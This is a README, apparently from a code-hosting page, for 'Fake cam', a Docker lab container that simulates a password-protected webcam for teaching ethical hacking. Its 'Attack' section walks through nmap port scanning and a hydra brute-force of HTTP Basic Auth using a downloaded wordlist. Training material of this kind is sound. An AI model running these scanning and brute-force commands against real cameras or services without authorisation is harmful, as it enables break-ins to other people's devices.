63 lines
853 B
Markdown
63 lines
853 B
Markdown
# Fake cam
|
|
|
|
Fake cam is a simple docker container running a fake webcam. It is used for educational purposes to teach ethical hacking.
|
|
|
|
> Default creds are : admin | xxxxxx
|
|
|
|
## Requirements
|
|
|
|
- Docker
|
|
|
|
## Install
|
|
|
|
1. Pull the repository
|
|
|
|
```bash
|
|
git clone https://git.phorge.fr/l-nmch/fake-cam.git
|
|
```
|
|
|
|
2. Build the image
|
|
|
|
```bash
|
|
docker compose build
|
|
```
|
|
|
|
## Deploy
|
|
|
|
1. Run the container
|
|
|
|
```bash
|
|
docker compose up -d
|
|
```
|
|
|
|
2. Verify cam access
|
|
|
|
```bash
|
|
curl -u admin:cam123 http://<ip>:3301
|
|
```
|
|
|
|
## Attack
|
|
|
|
1. Install required tools
|
|
|
|
```bash
|
|
apt install hydra curl nmap -y
|
|
```
|
|
|
|
2. Download the [wordlist](./wordlist.txt)
|
|
|
|
```bash
|
|
wget https://git.phorge.fr/l-nmch/fake-cam/raw/branch/master/wordlist.txt
|
|
```
|
|
|
|
3. Find open ports:
|
|
|
|
```bash
|
|
nmap -sC -sV <ip>
|
|
```
|
|
|
|
4. Bruteforce Basic-Auth
|
|
|
|
```bash
|
|
hydra -l admin -P wordlist.txt -s 3301 <ip> http-get /
|
|
``` |